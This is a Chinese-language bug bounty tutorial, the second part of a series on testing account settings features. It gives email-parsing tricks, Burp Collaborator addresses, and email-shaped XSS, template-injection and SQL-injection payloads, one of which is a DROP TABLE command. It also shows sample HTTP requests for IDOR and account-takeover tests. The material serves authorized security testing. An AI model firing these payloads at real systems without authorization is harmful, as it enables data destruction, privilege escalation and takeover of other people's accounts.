漏洞赏金猎人系列-如何测试设置(Setting)功能II

sandalwood

原文链接：漏洞赏金猎人系列-如何测试设置(Setting)功能II

漏洞赏金猎人系列-如何测试设置(Setting)功能II

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

正文

本文为本系列的第二弹,前篇有:

漏洞赏金猎人系列-如何测试设置(Setting)功能

第八种方法

如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: any@company.com ,从而获得额外权限，

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

email=any@company.com&action=add&token=CSRF

第九种方法

如果目标的业务系统中有增加第二个邮箱的功能,尝试用公司邮箱添加,比如: any@gmail.com@company.com ,从而获得额外权限，

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

email=any@gmail.com@company.com&action=add& token=CSRF

第十种方法

如果目标的业务系统中有增加第二个邮箱的功能,尝试用Burp Collaborator邮箱地址,可能会获取后台敏感信息

me@id.collaborator.net

user(;me@id.collaborator.net)@gmail.com

me@id.collaborator.net(@gmail.com)

me+(@gmail.com)@id.collaborator.net

<me@id.collaborator.net>user@gmail.com

第十一种方法

如果目标的业务系统中有增加第二个邮箱的功能,尝试用以下的payload,可能会有xss,ssti,sqli在等着你发现

me+(<script>alert(0)</script>)@gmail.com

me(<script>alert(0)</script>)@gmail.com

me@gmail(<script>alert(0)</script>).com

"<script>alert(0)</script>"@gmail.com

"<%= 7 * 7 %>"@gmail.com

me+(${{7*7}})@gmail.com

"' OR 1=1 -- '"@gmail.com

"me); DROP TABLE users;--"@gmail.com

me@[id.collaborator.net]

%@gmail.com

第十二种方法

如果有基于UUID的编辑，尝试使用另一个帐户的UUID,看看是否有IDOR

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

email=me@gmail.com&uuid=Your-UUID&token=CSRF

第十三种方法

将邮箱从Attacker@gmail.com更改为Victim@Gmail.com时，确认验证码是否也发送到Attacker@gmail.com，如果是，这里有账户劫持漏洞

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

newemail=victim@gmail.com&token=CSRF

第十四种方法

如果有基于手机号码的编辑功能，比如:修改密码，请尝试使用其他帐号的手机号码,测试是否有IDOR

POST /setting HTTP/1.1

Host: www.company.com

User-Agent: Mozilla/5.0

Content-Type: application/x-www-form-urlencoded

Referer: https://previous.com/path

Origin: https://www.company.com

Content-Length: Number

newPass=****&phone=Phone-Another-Account&token=CSRF

参考

https://hackerone.com/reports/565883

https://speakerdeck.com/aditya45/abusing-functions-for-bug-bounty?slide=5

https://www.youtube.com/watch?v=cThFNXrBYQU

https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses

https://twitter.com/intigriti/status/1318532648734773249

https://www.youtube.com/watch?time_continue=12&v=cbJ4NSYsUto&feature=emb_logo

https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17

https://hackerone.com/reports/95552

https://hackerone.com/reports/950881

https://hackerone.com/reports/969223

https://hackerone.com/reports/974222

https://hackerone.com/reports/791775

https://www.youtube.com/watch?v=ZFst3-r-9Lg